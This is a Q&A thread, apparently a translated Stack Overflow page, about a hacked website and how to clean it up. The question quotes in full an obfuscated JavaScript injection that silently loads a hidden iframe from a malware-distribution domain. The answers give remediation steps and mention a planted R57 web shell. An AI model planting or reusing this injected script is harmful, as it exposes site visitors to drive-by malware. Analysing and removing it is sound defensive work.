1

我是如何得到它们的,将来我能做些什么来避免这种情况?

#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#
4

3 回答 3

3

它似乎正在重定向或注入恶意软件分发者 absolutegift dot com 的内容。有人将其上传到您的服务器。此人(或机器人)可能已设法获取您的密码,或者他可能使用了漏洞。更改您的密码,确保所有用户输入(包括上传)都经过验证。确保您有防火墙正在运行(我推荐使用 csf)并扫描您的服务器以查找 rootkit。

于 2013-03-19T21:43:59.900 回答
0

联系您的托管服务提供商并通知他们该问题。 这一点非常重要 ,我已经关闭了许多合法网站,因为它们遭到入侵并且所有者丢失了所有数据。

  • 如果您使用的是 Drupal、Wordpress 等 CMS,请确保升级并更改管理员密码。如果您有任何插件,请确保它们已升级。
  • 如果您没有 CMS,请更改您的 FTP 和控制面板密码。

至于解决问题。如果您使用的是 CMS,就地升级应替换所有文件。如果没有,您可以下载所有文件并使用 Notepad++ 之类的文字处理器在整个目录中进行查找和替换。 此外,您的托管服务提供商可能能够从备份中恢复,或者至少有一些修复它的经验。

为了防止它,不要使用 CMS 并学习一些网络安全。可能聘请渗透测试员。

于 2013-03-19T21:55:54.763 回答
0

这也发生在一个运行 Drupal 5 的旧站点上。我所做的是下载该站点并使用 meld(Linux 的图形差异工具)将其与代码库的干净副本进行比较。我发现有一个名为 god.php 的文件位于其中一个子目录中,其中包含一个名为R57的 php 脚本。这东西能做什么,真是太可怕了。我的许多文件都感染了以下内容:

<?php
#8f4d8e#
...
#/8f4d8e#
?>

我手动清理了几次,但一直被黑客入侵,直到我删除了“god.php”文件。我认为它在您的系统上可能会以不同的方式调用。如果您对服务器具有 SSH 访问权限,请转到您的文档根目录并搜索包含该字符串的所有文件:

grep -R "#8f4d8e#" .

您还可以查找您的 god.php 文件版本...查找 R57 的痕迹,例如通过发出:

grep -R "R57" .

我的文件开头有一个很大的 ASCII 艺术图,描绘了一个错误。

我不知道我是怎么弄到它的,但是有一系列不好的东西:未更新的非常旧的 Drupal 版本,带有 register_globals 的 PHP4,共享主机(可能是一家糟糕的公司)。

我所做的是将清理后的站点移动到另一个使用 PHP 5 的托管公司并更改所有密码:drupal、ftp、mysql 等。

于 2013-03-23T14:44:20.243 回答